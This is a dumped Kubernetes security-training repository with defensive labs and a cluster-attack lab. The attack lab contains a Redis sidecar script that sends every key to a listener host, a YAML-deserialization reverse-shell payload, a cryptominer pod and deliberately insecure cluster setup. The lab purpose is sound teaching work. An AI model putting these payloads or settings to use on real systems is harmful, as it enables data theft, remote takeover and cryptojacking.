29 | labels: 30 | app: prometheus-server 31 | spec: 32 | containers: 33 | - name: prometheus 34 | image: prom/prometheus:v2.2.1 35 | args: 36 | - 
"--config.file=/etc/prometheus/prometheus.yml" 37 | - "--storage.tsdb.path=/prometheus/" 38 | ports: 39 | - containerPort: 9090 40 | volumeMounts: 41 | - name: prometheus-config-volume 42 | mountPath: /etc/prometheus/ 43 | - name: prometheus-storage-volume 44 | mountPath: /prometheus/ 45 | volumes: 46 | - name: prometheus-config-volume 47 | configMap: 48 | defaultMode: 420 49 | name: prometheus-server-conf 50 | 51 | - name: prometheus-storage-volume 52 | emptyDir: {} 53 | -------------------------------------------------------------------------------- /Kubernetes/Prometheus-Grafana/wecare-k8.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: wecare-lb 5 | spec: 6 | type: NodePort 7 | ports: 8 | - port: 80 9 | protocol: TCP 10 | targetPort: 80 11 | selector: 12 | app: we-care 13 | --- 14 | apiVersion: extensions/v1beta1 15 | kind: Deployment 16 | metadata: 17 | name: we-care 18 | spec: 19 | replicas: 2 20 | minReadySeconds: 15 21 | strategy: 22 | type: RollingUpdate 23 | rollingUpdate: 24 | maxUnavailable: 1 25 | maxSurge: 1 26 | template: 27 | metadata: 28 | labels: 29 | app: we-care 30 | spec: 31 | containers: 32 | - image: we45/wecare 33 | imagePullPolicy: IfNotPresent 34 | name: we-care 35 | ports: 36 | - containerPort: 80 37 | 38 | -------------------------------------------------------------------------------- /Kubernetes/README.md: -------------------------------------------------------------------------------- 1 | # [Kubernetes](README.md) 2 | 3 | 4 | ##### Kubernetes - Attacking A Cluster 5 | 6 | * [Cluster Attack](K8s-Cluster-Attack/README.md) 7 | 8 | 9 | ##### Kubernetes - Role Based Access Control 10 | 11 | * [Role Based Access Control](RoleBasedAccessControl/README.md) 12 | 13 | 14 | ##### Kubernetes - Pod Security Policy 15 | 16 | * [Pod Security Policy](PodSecurityPolicy/README.md) 17 | 18 | 19 | ##### Kubernetes - Resource Quota 20 | 21 | * [Resource 
Quota](ResourceQuota_Limit/README.md) 22 | 23 | 24 | ##### Kubernetes - Secrets 25 | 26 | * [KubeSeal - Sealed Secrets](SealedSecrets/README.md) 27 | 28 | * [Vault](Vault/README.md) 29 | 30 | 31 | ##### Kubernetes - Network Security Policy 32 | 33 | * [Istio](Istio/README.md) 34 | 35 | 36 | ##### Kubernetes - Vulnerability Assessment 37 | 38 | * [Kube-Sec](Kube-Sec/README.md) 39 | 40 | * [Kube-Bench](Kube-Bench/README.md) 41 | 42 | * [Kube-Hunter](Kube-Hunter/README.md) 43 | 44 | 45 | ##### Kubernetes - Monitoring and Logging 46 | 47 | * [Prometheus-Grafana](Prometheus-Grafana/README.md) 48 | 49 | * [Sysdig Falco](SysdigFalco/README.md) 50 | -------------------------------------------------------------------------------- /Kubernetes/ResourceQuota_Limit/README.md: -------------------------------------------------------------------------------- 1 | # Resource Quotas and Limits 2 | 3 | ##### Step 1: 4 | 5 | * Navigate to the `ResourceQuota_Limit` directory 6 | 7 | ```bash 8 | cd /root/container_training/Kubernetes/ResourceQuota_Limit 9 | ``` 10 | 11 | ##### Step 2: 12 | 13 | * Create a pod in the `default` namespace. 14 | 15 | ```bash 16 | kubectl create -f nginx-basic-limit.yaml 17 | ``` 18 | 19 | * Ensure that the `Status` of the pod is set to `Running` 20 | 21 | ```bash 22 | kubectl get pods 23 | ``` 24 | 25 | ##### Step 3: 26 | 27 | * Now test the memory consumption of the pod with the `stress` command: 28 | 29 | * Run `kubectl exec -it nginx-resource -- stress --cpu 1 --io 1 --vm 2 --vm-bytes 100M` 30 | 31 | * Stop it and run: `kubectl exec -it nginx-resource -- stress --cpu 1 --io 1 --vm 2 --vm-bytes 200M` 32 | 33 | * Stop it and run `kubectl exec -it nginx-resource -- stress --cpu 1 --io 1 --vm 2 --vm-bytes 400M` 34 | 35 | * It can be observed that the stress test fails with `exit code 1` at 400M: each of the two `--vm` workers allocates 400M, so the pod's total memory exceeds the 500Mi memory limit specified in the Pod Spec (`nginx-basic-limit.yaml`), whereas the 100M and 200M runs stay under it. 
36 | 37 | ##### Step 4: 38 | 39 | * Delete the pod 40 | 41 | ```bash 42 | kubectl delete -f nginx-basic-limit.yaml 43 | ``` -------------------------------------------------------------------------------- /Kubernetes/ResourceQuota_Limit/nginx-basic-limit.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: nginx-resource 5 | namespace: default 6 | spec: 7 | containers: 8 | - image: sharathwe45/nginx-stress 9 | name: nginx 10 | resources: 11 | requests: 12 | memory: 400Mi 13 | limits: 14 | memory: 500Mi -------------------------------------------------------------------------------- /Kubernetes/RoleBasedAccessControl/img/rbac-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/RoleBasedAccessControl/img/rbac-1.png -------------------------------------------------------------------------------- /Kubernetes/RoleBasedAccessControl/img/rbac-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/RoleBasedAccessControl/img/rbac-2.png -------------------------------------------------------------------------------- /Kubernetes/RoleBasedAccessControl/img/rbac-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/RoleBasedAccessControl/img/rbac-3.png -------------------------------------------------------------------------------- /Kubernetes/RoleBasedAccessControl/img/rbac-4.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/RoleBasedAccessControl/img/rbac-4.png -------------------------------------------------------------------------------- /Kubernetes/RoleBasedAccessControl/img/rbac-5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/RoleBasedAccessControl/img/rbac-5.png -------------------------------------------------------------------------------- /Kubernetes/RoleBasedAccessControl/img/rbac-6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/RoleBasedAccessControl/img/rbac-6.png -------------------------------------------------------------------------------- /Kubernetes/RoleBasedAccessControl/img/rbac-7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/RoleBasedAccessControl/img/rbac-7.png -------------------------------------------------------------------------------- /Kubernetes/RoleBasedAccessControl/img/rbac-8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/RoleBasedAccessControl/img/rbac-8.png -------------------------------------------------------------------------------- /Kubernetes/RoleBasedAccessControl/img/rbac-9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/RoleBasedAccessControl/img/rbac-9.png 
-------------------------------------------------------------------------------- /Kubernetes/RoleBasedAccessControl/role-deployment-manager.yaml: -------------------------------------------------------------------------------- 1 | kind: Role 2 | apiVersion: rbac.authorization.k8s.io/v1beta1 3 | metadata: 4 | namespace: restricted-namespace 5 | name: deployment-manager 6 | rules: 7 | - apiGroups: ["", "extensions", "apps"] 8 | resources: 9 | - deployments 10 | - replicasets 11 | - pods 12 | - services 13 | verbs: 14 | - get 15 | - list 16 | - watch 17 | - create 18 | - update 19 | - patch 20 | 21 | -------------------------------------------------------------------------------- /Kubernetes/RoleBasedAccessControl/rolebinding-deployment-manager.yaml: -------------------------------------------------------------------------------- 1 | kind: RoleBinding 2 | apiVersion: rbac.authorization.k8s.io/v1beta1 3 | metadata: 4 | name: deployment-manager-binding 5 | namespace: restricted-namespace 6 | subjects: 7 | - kind: User 8 | name: restricteduser 9 | apiGroup: "" 10 | roleRef: 11 | kind: Role 12 | name: deployment-manager 13 | apiGroup: "" 14 | 15 | -------------------------------------------------------------------------------- /Kubernetes/SealedSecrets/README.md: -------------------------------------------------------------------------------- 1 | # Kubernetes Sealed Secrets - Kubeseal 2 | 3 | ##### Step 1: 4 | 5 | * Navigate to the `SealedSecrets` directory 6 | 7 | ```bash 8 | cd /root/container_training/Kubernetes/SealedSecrets 9 | ``` 10 | 11 | ##### Step 2: 12 | 13 | * Ensure that K8s is running 14 | 15 | ```bash 16 | kubectl get nodes 17 | ``` 18 | 19 | ##### Step 3: 20 | 21 | * Create `SealedSecret` controller and Custom Resource Definition 22 | 23 | ```bash 24 | kubectl create -f controller.yaml 25 | 26 | kubectl create -f sealedsecret-crd.yaml 27 | ``` 28 | 29 | ##### Step 4: 30 | 31 | * Seal the existing secret with `kubeseal` 32 | 33 | ```bash 34 | kubeseal 
< mysecret.json > mysealedsecret.json 35 | ``` 36 | 37 | * Check the sealed-secret file 38 | 39 | ```bash 40 | cat mysealedsecret.json 41 | ``` 42 | 43 | ##### Step 5: 44 | 45 | * Create the Sealed-Secret 46 | 47 | ```bash 48 | kubectl create -f mysealedsecret.json 49 | ``` 50 | 51 | * Check the created Secret 52 | 53 | ```bash 54 | kubectl get secrets 55 | ``` 56 | 57 | 58 | ##### Step 6: 59 | 60 | * Delete the created sealed secret 61 | 62 | ```bash 63 | kubectl delete -f mysealedsecret.json 64 | ``` 65 | 66 | 67 | ##### Step 7: 68 | 69 | * Remove the SealedSecret controller and the Custom Resource Definition 70 | 71 | ```bash 72 | kubectl delete -f controller.yaml 73 | 74 | kubectl delete -f sealedsecret-crd.yaml 75 | ``` -------------------------------------------------------------------------------- /Kubernetes/SealedSecrets/mysecret.json: -------------------------------------------------------------------------------- 1 | { 2 | "kind": "Secret", 3 | "apiVersion": "v1", 4 | "metadata": { 5 | "name": "mysecret", 6 | "creationTimestamp": null 7 | }, 8 | "data": { 9 | "mysql_pass": "bm9uZW9meW9iaXpuZXNzMTIz", 10 | "mysql_user": "cm9vdA==" 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /Kubernetes/SealedSecrets/sealedsecret-crd.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | apiVersion: apiextensions.k8s.io/v1beta1 3 | kind: CustomResourceDefinition 4 | metadata: 5 | name: sealedsecrets.bitnami.com 6 | spec: 7 | group: bitnami.com 8 | names: 9 | kind: SealedSecret 10 | listKind: SealedSecretList 11 | plural: sealedsecrets 12 | singular: sealedsecret 13 | scope: Namespaced 14 | version: v1alpha1 15 | -------------------------------------------------------------------------------- /Kubernetes/SysdigFalco/README.md: -------------------------------------------------------------------------------- 1 | # Profiling and Logging - sysdig-falco 2 | 3 | 4 | ##### Step 1: 5 | 6 | * Navigate to the 
`SysdigFalco` directory 7 | 8 | ```bash 9 | cd /root/container_training/Kubernetes/SysdigFalco 10 | ``` 11 | 12 | ##### Step 2: 13 | 14 | * Fetch the Server IP 15 | 16 | ```bash 17 | serverip 18 | ``` 19 | 20 | ##### Step 3: 21 | 22 | * Edit `falco_daemonset.yaml` and replace the `SERVER-IP` placeholder in the curl command on `line 21` with the server IP fetched in Step 2 (`YOUR-SERVER-IP` below stands for that address). 23 | 24 | ```bash 25 | sed -i -e 's/SERVER-IP/YOUR-SERVER-IP/g' falco_daemonset.yaml 26 | ``` 27 | 28 | EXAMPLE: 29 | 30 | ```yaml 31 | args: [ "/usr/bin/falco", "-pk", "-o", "json_output=true", "-o", "program_output.enabled=true", "-o", "program_output.program=jq '{text: .output}' | curl -d @- -X POST http://192.168.1.1:9090"] 32 | ``` 33 | 34 | ##### Step 4: 35 | 36 | * Create the Falco daemonset 37 | 38 | ```bash 39 | kubectl create -f falco_daemonset.yaml 40 | ``` 41 | 42 | ##### Step 5: 43 | 44 | * Create a Pod that intentionally generates malicious events 45 | 46 | ```bash 47 | kubectl create -f falco-event-generator-deployment.yaml 48 | 49 | kubectl get deployments 50 | 51 | kubectl get pods 52 | ``` 53 | 54 | * Ensure that the `Status` of the pods is `Running` 55 | 56 | ##### Step 6: 57 | 58 | 59 | * Start the tornado server to receive the real-time logs of malicious events (Falco POSTs each event to port 9090, where `tornado_server.py` listens) 60 | 61 | ```bash 62 | ./tornado_server.py 63 | ``` 64 | 65 | * Stop the tornado server with `ctrl + c` 66 | 67 | ##### Step 7: 68 | 69 | * Delete the malicious event-generator deployment and the Falco daemonset 70 | 71 | ```bash 72 | kubectl delete -f falco-event-generator-deployment.yaml -f falco_daemonset.yaml 73 | ``` 74 | -------------------------------------------------------------------------------- /Kubernetes/SysdigFalco/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/SysdigFalco/__init__.py -------------------------------------------------------------------------------- /Kubernetes/SysdigFalco/falco-event-generator-deployment.yaml: 
-------------------------------------------------------------------------------- 1 | apiVersion: extensions/v1beta1 2 | kind: Deployment 3 | metadata: 4 | name: falco-event-generator-deployment 5 | labels: 6 | name: falco-event-generator-deployment 7 | app: demo 8 | spec: 9 | replicas: 1 10 | template: 11 | metadata: 12 | labels: 13 | app: falco-event-generator 14 | spec: 15 | containers: 16 | - name: falco-event-generator 17 | image: sysdig/falco-event-generator:latest 18 | 19 | -------------------------------------------------------------------------------- /Kubernetes/SysdigFalco/img/sysdig-falco-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/SysdigFalco/img/sysdig-falco-1.png -------------------------------------------------------------------------------- /Kubernetes/SysdigFalco/img/sysdig-falco-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/SysdigFalco/img/sysdig-falco-2.png -------------------------------------------------------------------------------- /Kubernetes/SysdigFalco/img/sysdig-falco-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/SysdigFalco/img/sysdig-falco-3.png -------------------------------------------------------------------------------- /Kubernetes/SysdigFalco/img/sysdig-falco-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/SysdigFalco/img/sysdig-falco-4.png -------------------------------------------------------------------------------- 
/Kubernetes/SysdigFalco/img/sysdig-falco-5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/SysdigFalco/img/sysdig-falco-5.png -------------------------------------------------------------------------------- /Kubernetes/SysdigFalco/img/sysdig-falco-6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/SysdigFalco/img/sysdig-falco-6.png -------------------------------------------------------------------------------- /Kubernetes/SysdigFalco/img/sysdig-falco-7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/SysdigFalco/img/sysdig-falco-7.png -------------------------------------------------------------------------------- /Kubernetes/SysdigFalco/tornado_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import tornado.ioloop 4 | import tornado.web 5 | import pprint 6 | 7 | 8 | class MyDumpHandler(tornado.web.RequestHandler): 9 | def post(self): 10 | pprint.pprint(self.request) 11 | pprint.pprint(self.request.body) 12 | 13 | if __name__ == "__main__": 14 | tornado.web.Application([(r"/.*", MyDumpHandler),]).listen(9090) 15 | tornado.ioloop.IOLoop.instance().start() 16 | 17 | -------------------------------------------------------------------------------- /Kubernetes/VM/Initial-Setup/README.md: -------------------------------------------------------------------------------- 1 | # K8s VM Initial Setup 2 | 3 | ##### Step 1: 4 | 5 | * Run the following command(s) to get the latest files 6 | 7 | ```bash 8 | cd /home/we45/container_training && git pull 9 | 10 | echo 
"hostname -I | cut -d' ' -f1" > /usr/local/bin/vmip && chmod +x /usr/local/bin/vmip 11 | 12 | kubectl delete --all pods -n default 13 | ``` 14 | -------------------------------------------------------------------------------- /Kubernetes/VM/K8s-Cluster-Attack/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/K8s-Cluster-Attack/__init__.py -------------------------------------------------------------------------------- /Kubernetes/VM/K8s-Cluster-Attack/malicious-redis/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM redis:alpine 2 | 3 | ENV CLIENTPORT 6379 4 | ENV MASTERPORT 6379 5 | ENV MASTERHOST 192.168.122.1 6 | ENV CLIENTHOST 0.0.0.0 7 | ENV APPENDFSYNC=everysec 8 | ENV LISTENER_IP 192.168.122.1 9 | ENV LISTENER_PORT 9080 10 | 11 | ADD redis.conf /etc/redis.conf 12 | RUN chown redis:redis /etc/redis.conf 13 | RUN apk add curl 14 | COPY post_db.sh / 15 | RUN chmod +x /post_db.sh 16 | EXPOSE $CLIENTPORT 17 | 18 | ADD docker-entrypoint.sh /usr/local/bin/docker-entrypoint.sh 19 | ENTRYPOINT ["docker-entrypoint.sh"] 20 | 21 | CMD [ "redis-server","/etc/redis.conf" ] 22 | 23 | -------------------------------------------------------------------------------- /Kubernetes/VM/K8s-Cluster-Attack/malicious-redis/docker-entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | set -ex 3 | 4 | ## from redis-3.2 5 | sed -i "s/bind 127.0.0.1/bind $CLIENTHOST/g" /etc/redis.conf 6 | 7 | ## redis port inside redis.conf 8 | sed -i "s/port 6379/port $CLIENTPORT/g" /etc/redis.conf 9 | # sed -i "s/# requirepass foobared/requirepass $REQUIREPASS/g" /etc/redis.conf 10 | # sed -i "s/# masterauth /masterauth $REQUIREPASS/g" /etc/redis.conf 11 | 12 | ## slaveof => slaveof $MASTERHOST $MASTERPORT 13 | if [ "$MASTERPORT" != "" 
];then 14 | sed -i "s/# slaveof /slaveof $MASTERHOST $MASTERPORT/g" /etc/redis.conf 15 | fi 16 | 17 | ## appendfsync everysec => appendfsync $APPENDFSYNC 18 | if [ "$APPENDFSYNC" != "" ];then 19 | sed -i "s/appendonly no/appendonly yes/g" /etc/redis.conf 20 | sed -i "s/appendfsync everysec/appendfsync $APPENDFSYNC/g" /etc/redis.conf 21 | fi 22 | 23 | 24 | # first arg is `-f` or `--some-option` 25 | # or first arg is `something.conf` 26 | if [ "${1#-}" != "$1" ] || [ "${1%.conf}" != "$1" ]; then 27 | set -- redis-server "$@" 28 | fi 29 | 30 | # allow the container to be started with `--user` 31 | if [ "$1" = 'redis-server' -a "$(id -u)" = '0' ]; then 32 | nohup /post_db.sh > /dev/null 2>&1 & 33 | chown -R redis . 34 | exec su-exec redis "$@" 35 | fi 36 | 37 | exec "$@" 38 | -------------------------------------------------------------------------------- /Kubernetes/VM/K8s-Cluster-Attack/malicious-redis/post_db.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | while :; do 3 | sleep 10 4 | for each in $( redis-cli KEYS \* ); do 5 | result=$(redis-cli type $each) 6 | value="" 7 | if [ $result == "list" ] 8 | then 9 | value=$(redis-cli lrange $each 0 -1) 10 | elif [ $result == "string" ] 11 | then 12 | value=$(redis-cli get $each) 13 | elif [ $result == "set" ] 14 | then 15 | value=$(redis-cli smembers $each) 16 | fi 17 | curl -X POST -H "Content-Type: application/json; charset=UTF-8" -d "{\"key\": \"$each\", \"value\": \"$value\"}" http://$LISTENER_IP:$LISTENER_PORT 18 | sleep 1 19 | done 20 | sleep 10 21 | done 22 | -------------------------------------------------------------------------------- /Kubernetes/VM/K8s-Cluster-Attack/malicious_pods/cminer.json: -------------------------------------------------------------------------------- 1 | { 2 | "kind": "Pod", 3 | "apiVersion": "v1", 4 | "metadata": { 5 | "name": "cmine" 6 | }, 7 | "spec": { 8 | "containers": [{ 9 | "name": "cmine", 10 | "image": 
"tseabra/coin-hive", 11 | "command": ["./coin-hive","Ipf5vWwTX3gO6jd00mm1Wrg3SmNkLk0k"] 12 | }] 13 | } 14 | } -------------------------------------------------------------------------------- /Kubernetes/VM/K8s-Cluster-Attack/malicious_pods/malicious-redis-slave.json: -------------------------------------------------------------------------------- 1 | { 2 | "kind": "Pod", 3 | "apiVersion": "v1", 4 | "metadata": { 5 | "name": "mal-redis" 6 | }, 7 | "spec": { 8 | "containers": [{ 9 | "name": "mal-redis", 10 | "image": "we45/malicious-redis-slave", 11 | "env": [ 12 | { 13 | "name": "MASTERHOST", 14 | "value": "127.0.0.1" 15 | }, 16 | { 17 | "name": "MASTERPORT", 18 | "value": "6379" 19 | }, 20 | { 21 | "name": "LISTENER_IP", 22 | "value": "192.168.1.5" 23 | }, 24 | { 25 | "name": "LISTENER_PORT", 26 | "value": "3999" 27 | } 28 | ] 29 | }] 30 | } 31 | } -------------------------------------------------------------------------------- /Kubernetes/VM/K8s-Cluster-Attack/ngflask-redis-service.yml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: ngflask-redis-service 5 | spec: 6 | ports: 7 | - port: 80 8 | protocol: TCP 9 | selector: 10 | app: ngflask-redis 11 | type: NodePort -------------------------------------------------------------------------------- /Kubernetes/VM/K8s-Cluster-Attack/ngflaskredis-deployment.yml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: ngflask-redis 5 | labels: 6 | app: ngflask-redis 7 | spec: 8 | containers: 9 | - name: nginx 10 | image: nginx:1.11 11 | ports: 12 | - containerPort: 80 13 | volumeMounts: 14 | - mountPath: /etc/nginx/conf.d 15 | name: config-volume 16 | - name: redis 17 | image: redis 18 | ports: 19 | - containerPort: 6379 20 | - name: vulflask-redis 21 | image: abhaybhargav/vul_flask_redis 22 | imagePullPolicy: Always 23 | env: 24 | - name: 
REDIS_HOST 25 | value: 127.0.0.1 26 | ports: 27 | - containerPort: 5000 28 | name: vulflask-port 29 | volumes: 30 | - name: config-volume 31 | configMap: 32 | name: nginx-config 33 | items: 34 | - key: reverseproxy.conf 35 | path: reverseproxy.conf 36 | -------------------------------------------------------------------------------- /Kubernetes/VM/K8s-Cluster-Attack/payloads/reverse_shell.yml: -------------------------------------------------------------------------------- 1 | name: PayTM Bill payment 3 2 | reason: !!python/object/apply:os.system ["echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"VM-IP-Here\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' > shell.py && python shell.py &"] 3 | merchant: Hello World Traders 4 | amount: 12 5 | card: 4111111111111111 -------------------------------------------------------------------------------- /Kubernetes/VM/K8s-Cluster-Attack/payloads/test_payment.yml: -------------------------------------------------------------------------------- 1 | name: PayTM Bill payment 5 2 | reason: !!python/object/apply:subprocess.check_output ["printenv"] 3 | merchant: Hello World Traders 4 | amount: 112 5 | card: 5111111111111111 -------------------------------------------------------------------------------- /Kubernetes/VM/K8s-Cluster-Attack/redis-service.yml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: redis-service 5 | spec: 6 | ports: 7 | - port: 6379 8 | protocol: TCP 9 | selector: 10 | app: ngflask-redis 11 | type: NodePort -------------------------------------------------------------------------------- /Kubernetes/VM/K8s-Cluster-Attack/reverseproxy.conf: -------------------------------------------------------------------------------- 1 | server { 2 | listen 80; 3 | server_name localhost; 4 | 5 | location / { 6 | 
proxy_bind 127.0.0.1;
        proxy_pass http://127.0.0.1:5000;
    }

    error_page 500 502 503 504 /50x.html;
    location = /50x.html {
        root /usr/share/nginx/html;
    }
}
-------------------------------------------------------------------------------- /Kubernetes/VM/K8s-Cluster-Attack/setup_flask_stack.sh: --------------------------------------------------------------------------------
#!/usr/bin/env bash
# Deploys the deliberately vulnerable nginx + flask + redis lab pod and the
# Services that expose it. Run from this directory: reverseproxy.conf is read
# from the working directory. Assumes kubectl already points at the lab
# cluster (see setup_insecure_kube.sh).

# nginx reads reverseproxy.conf from this ConfigMap, mounted at /etc/nginx/conf.d
kubectl create configmap nginx-config --from-file=reverseproxy.conf
echo "Deploying Vul Flask Nginx Pod"
kubectl create -f ngflaskredis-deployment.yml
# Fixed delay only; creating the Services below does not depend on the pod being Ready.
sleep 5
echo "Deploying Vul-Flask-Nginx Service"
kubectl create -f ngflask-redis-service.yml
# NOTE(review): redis-service.yml publishes the pod's redis port (6379) as a NodePort,
# i.e. redis becomes reachable from outside the cluster. Presumably the lab's intended
# weakness - do not reuse this manifest outside the training VM.
kubectl create -f redis-service.yml
-------------------------------------------------------------------------------- /Kubernetes/VM/K8s-Cluster-Attack/setup_insecure_kube.sh: --------------------------------------------------------------------------------
#!/usr/bin/env bash
# Brings up a single-node minikube cluster that is INTENTIONALLY insecure, as the
# target for the K8s-Cluster-Attack exercises. Never run this on a shared host.

# --vm-driver=none runs the Kubernetes components directly on this host (no VM).
# kubelet.authorization-mode=AlwaysAllow disables authorization on the kubelet API:
# every request that reaches the kubelet port is authorized (with anonymous auth left
# at its default this means unauthenticated callers can list/exec/read logs of pods).
minikube start --vm-driver=none --extra-config=kubelet.authorization-mode=AlwaysAllow
sleep 5
# Grants cluster-admin to the default ServiceAccount of the default namespace. Pods
# created there without an explicit serviceAccountName get this SA's token mounted,
# so code execution in any such pod (e.g. via payloads/reverse_shell.yml) yields
# cluster-admin on the API server.
kubectl create clusterrolebinding badboy --clusterrole cluster-admin --serviceaccount=default:default
echo "kubernetes initialized in insecure mode..."
-------------------------------------------------------------------------------- /Kubernetes/VM/K8s-Cluster-Attack/tornado_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import tornado.ioloop 4 | import tornado.web 5 | import pprint 6 | 7 | 8 | class MyDumpHandler(tornado.web.RequestHandler): 9 | def post(self): 10 | pprint.pprint(self.request) 11 | pprint.pprint(self.request.body) 12 | 13 | if __name__ == "__main__": 14 | tornado.web.Application([(r"/.*", MyDumpHandler),]).listen(9090) 15 | tornado.ioloop.IOLoop.instance().start() 16 | 17 | -------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Bench/README.md: -------------------------------------------------------------------------------- 1 | # K8s CIS Benchmark - Kube-bench 2 | 3 | 4 | ##### Step 1: 5 | 6 | * Navigate to the `Kube-Bench` directory 7 | 8 | ```bash 9 | cd /home/we45/container_training/Kubernetes/VM/Kube-Bench 10 | ``` 11 | 12 | 13 | ##### Step 2: 14 | 15 | * To get a list of available commands and options, run the following command 16 | 17 | ```bash 18 | ./kube-bench --help 19 | ``` 20 | 21 | 22 | ##### Step 3: 23 | 24 | * To run CIS benchmark scan, run 25 | 26 | ```bash 27 | ./kube-bench master 28 | ``` 29 | 30 | 31 | ##### Step 4: 32 | 33 | * To save results to a `json` file, run the following command 34 | 35 | If a `.json` report is necessary, run 36 | 37 | ```bash 38 | ./kube-bench --json master > report.json 39 | ``` 40 | -------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Bench/cfg/1.8/config.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | ## Controls Files. 3 | # These are YAML files that hold all the details for running checks. 4 | # 5 | ## Uncomment to use different control file paths. 
6 | # masterControls: ./cfg/master.yaml 7 | # nodeControls: ./cfg/node.yaml 8 | # federatedControls: ./cfg/federated.yaml 9 | 10 | master: 11 | apiserver: 12 | confs: 13 | - /etc/kubernetes/manifests/kube-apiserver.yaml 14 | - /etc/kubernetes/manifests/kube-apiserver.manifest 15 | defaultconf: /etc/kubernetes/manifests/kube-apiserver.yaml 16 | 17 | scheduler: 18 | confs: 19 | - /etc/kubernetes/manifests/kube-scheduler.yaml 20 | - /etc/kubernetes/manifests/kube-scheduler.manifest 21 | defaultconf: /etc/kubernetes/manifests/kube-scheduler.yaml 22 | 23 | controllermanager: 24 | confs: 25 | - /etc/kubernetes/manifests/kube-controller-manager.yaml 26 | - /etc/kubernetes/manifests/kube-controller-manager.manifest 27 | defaultconf: /etc/kubernetes/manifests/kube-controller-manager.yaml 28 | 29 | etcd: 30 | confs: 31 | - /etc/kubernetes/manifests/etcd.yaml 32 | - /etc/kubernetes/manifests/etcd.manifest 33 | defaultconf: /etc/kubernetes/manifests/etcd.yaml 34 | 35 | node: 36 | kubelet: 37 | confs: 38 | - /etc/systemd/system/kubelet.service.d/10-kubeadm.conf 39 | defaultconf: /etc/systemd/system/kubelet.service.d/10-kubeadm.conf 40 | 41 | proxy: 42 | confs: 43 | - /etc/kubernetes/addons/kube-proxy-daemonset.yaml 44 | defaultconf: /etc/kubernetes/addons/kube-proxy-daemonset.yaml 45 | -------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Bench/img/kube-bench-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Bench/img/kube-bench-1.png -------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Bench/img/kube-bench-2.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Bench/img/kube-bench-2.png
-------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Bench/img/kube-bench-3.png: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Bench/img/kube-bench-3.png
